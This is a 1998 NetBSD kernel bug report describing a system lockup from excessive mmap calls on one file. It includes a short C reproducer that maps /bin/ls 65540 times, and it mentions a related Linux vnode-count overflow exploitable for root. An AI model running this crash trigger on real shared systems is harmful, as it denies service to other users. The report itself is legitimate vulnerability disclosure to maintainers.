>Number:         4804
>Category:       kern
>Synopsis:       excessive mmaps in one process crash system
>Confidential:   yes
>Severity:       serious
>Priority:       medium
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Sun Jan 11 14:50:01 1998
>Last-Modified:
>Originator:     David A. Holland <dholland@eecs.harvard.edu>
>Organization:
   - David A. Holland             |    VINO project home page:
     dholland@eecs.harvard.edu    | http://www.eecs.harvard.edu/vino
>Release:        1.2.1
>Environment:
	
System: NetBSD chianti.eecs.harvard.edu 1.2.1 NetBSD 1.2.1 (CHIANTI) #1: Tue Sep 9 16:52:39 EDT 1997 root@chianti.eecs.harvard.edu:/usr/src/sys/arch/i386/compile/CHIANTI i386


>Description:
	If you map one file too many times, or make too many mappings in
	one process (haven't determined which yet) the system locks up
	and stops responding to anything but ping.

	I discovered this while testing some code that does unpleasant
	things to Linux. In Linux the problem is related to overflow in
	the vnode use count, which is only 16 bits.

	The Linux problem is more serious in that instead of crashing,
	the system keeps running using free vnodes, which can then be
	exploited to gain root. It is not public yet, but probably will
	be in a few days (hence the confidentiality request).
>How-To-Repeat:


#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

void main()
{
 int fd, i;

 fd = open("/bin/ls", O_RDONLY);

 for(i = 0; i < 65540; i++)
 {
  mmap((char*)0x50000000 + (0x1000 * i), 0x1000,
   PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
 }
}

>Fix:
	Don't know yet.

>Audit-Trail:
>Unformatted: